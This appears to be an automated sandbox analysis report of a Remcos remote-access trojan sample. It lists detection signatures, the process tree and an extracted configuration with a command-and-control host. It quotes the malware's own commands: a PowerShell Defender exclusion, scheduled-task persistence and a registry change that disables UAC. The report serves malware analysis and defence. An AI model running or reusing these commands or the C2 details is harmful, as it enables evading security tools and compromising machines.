Windows Analysis Report
SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe

Overview

General Information

Sample name:SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
Analysis ID:1544039
MD5:03a6863e7931768c020f1a98531e5212
SHA1:7fbf21510ba0927b16f9de491e6dace95a35c228
SHA256:96e41c2d613926361afebfc693537919269ae11f3ff721eb4f60bf823258e154
Tags:exe
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe (PID: 5328 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe" MD5: 03A6863E7931768C020F1A98531E5212)
    • powershell.exe (PID: 5356 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7404 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 6188 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5016 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp8E60.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • mXJeXQoaGktJCW.exe (PID: 7356 cmdline: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe MD5: 03A6863E7931768C020F1A98531E5212)
    • schtasks.exe (PID: 7636 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp9E3E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mXJeXQoaGktJCW.exe (PID: 7684 cmdline: "C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe" MD5: 03A6863E7931768C020F1A98531E5212)
    • mXJeXQoaGktJCW.exe (PID: 7692 cmdline: "C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe" MD5: 03A6863E7931768C020F1A98531E5212)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["bubemoney7221.duckdns.org:2404:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7XAUXH", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "dfgh", "Keylog file max size": ""}
Source | Rule | Description | Author | Strings
C:\ProgramData\dfgh\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

Source | Rule | Description | Author | Strings
00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
0000000F.00000002.2097259168.00000000014D7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
(table truncated: 19 entries in the full report)

Source | Rule | Description | Author | Strings
15.2.mXJeXQoaGktJCW.exe.400000.0.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
15.2.mXJeXQoaGktJCW.exe.400000.0.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
15.2.mXJeXQoaGktJCW.exe.400000.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
15.2.mXJeXQoaGktJCW.exe.400000.0.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown |
  • 0x6aab8:$a1: Remcos restarted by watchdog!
  • 0x6b030:$a3: %02i:%02i:%02i:%03i
15.2.mXJeXQoaGktJCW.exe.400000.0.unpack | REMCOS_RAT_variants | unknown | unknown |
  • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64b7c:$str_b2: Executing file:
  • 0x65bfc:$str_b3: GetDirectListeningPort
  • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x65728:$str_b7: \update.vbs
  • 0x64ba4:$str_b9: Downloaded file:
  • 0x64b90:$str_b10: Downloading file:
  • 0x64c34:$str_b12: Failed to upload file:
  • 0x65bc4:$str_b13: StartForward
  • 0x65be4:$str_b14: StopForward
  • 0x65680:$str_b15: fso.DeleteFile "
  • 0x65614:$str_b16: On Error Resume Next
  • 0x656b0:$str_b17: fso.DeleteFolder "
  • 0x64c24:$str_b18: Uploaded file:
  • 0x64be4:$str_b19: Unable to delete:
  • 0x65648:$str_b20: while fso.FileExists("
  • 0x650c1:$str_c0: [Firefox StoredLogins not found]
(table truncated: 29 entries in the full report)

                    System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, ParentProcessId: 5328, ParentProcessName: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe", ProcessId: 5356, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, ParentProcessId: 5328, ParentProcessName: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe", ProcessId: 5356, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp9E3E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp9E3E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe, ParentImage: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe, ParentProcessId: 7356, ParentProcessName: mXJeXQoaGktJCW.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp9E3E.tmp", ProcessId: 7636, ProcessName: schtasks.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp8E60.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp8E60.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, ParentProcessId: 5328, ParentProcessName: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp8E60.tmp", ProcessId: 5016, ProcessName: schtasks.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, ParentProcessId: 5328, ParentProcessName: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe", ProcessId: 5356, ProcessName: powershell.exe

                    Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp8E60.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp8E60.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, ParentProcessId: 5328, ParentProcessName: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp8E60.tmp", ProcessId: 5016, ProcessName: schtasks.exe

                    Stealing of Sensitive Information

Source: Registry Key set; Author: Joe Security; Data: Details: […], EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, ProcessId: 7308, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-7XAUXH\exepath

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-28T18:37:05.648954+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49712 | 103.186.117.77 | 2404 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-28T18:37:06.737690+0100 | 2032777 | 1 | Malware Command and Control Activity Detected | 103.186.117.77 | 2404 | 192.168.2.5 | 49712 | TCP
2024-10-28T18:39:33.065313+0100 | 2032777 | 1 | Malware Command and Control Activity Detected | 103.186.117.77 | 2404 | 192.168.2.5 | 49712 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-28T18:37:15.238483+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.5 | 49714 | 178.237.33.50 | 80 | TCP

                    AV Detection

Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Avira: detection malicious, Label: HEUR/AGEN.1362875
Source: 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["bubemoney7221.duckdns.org:2404:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7XAUXH", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "dfgh", "Keylog file max size": ""}
Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | ReversingLabs: Detection: 23%
Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | ReversingLabs: Detection: 23%
Source: Yara match | File source: 15.2.mXJeXQoaGktJCW.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.mXJeXQoaGktJCW.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2097259168.00000000014D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2081908581.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe PID: 5328, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe PID: 7308, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: mXJeXQoaGktJCW.exe PID: 7692, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\dfgh\logs.dat, type: DROPPED
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Joe Sandbox ML: detected
Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,15_2_004338C8
Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000000.00000002.2081908581.00000000034F9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_e9711586-d

                    Exploits

Source: Yara match | File source: 15.2.mXJeXQoaGktJCW.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.mXJeXQoaGktJCW.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2081908581.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe PID: 5328, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: mXJeXQoaGktJCW.exe PID: 7692, type: MEMORYSTR

                    Privilege Escalation

Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_00407538 _wcslen,CoGetObject,15_2_00407538
Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 9_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_100010F1
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 9_2_10006580 FindFirstFileExA,9_2_10006580
Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_0040928E
Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,15_2_0041C322
Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,15_2_0040C388
Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_004096A0
Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,15_2_00408847
Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_00407877 FindFirstFileW,FindNextFileW,15_2_00407877
Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_0044E8F9 FindFirstFileExA,15_2_0044E8F9
Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_0040BB6B
Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,15_2_00419B86
Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_0040BD72
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_0040AE51 FindFirstFileW,FindNextFileW,17_2_0040AE51
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407EF8
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 20_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,20_2_00407898
Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,15_2_00407CD2
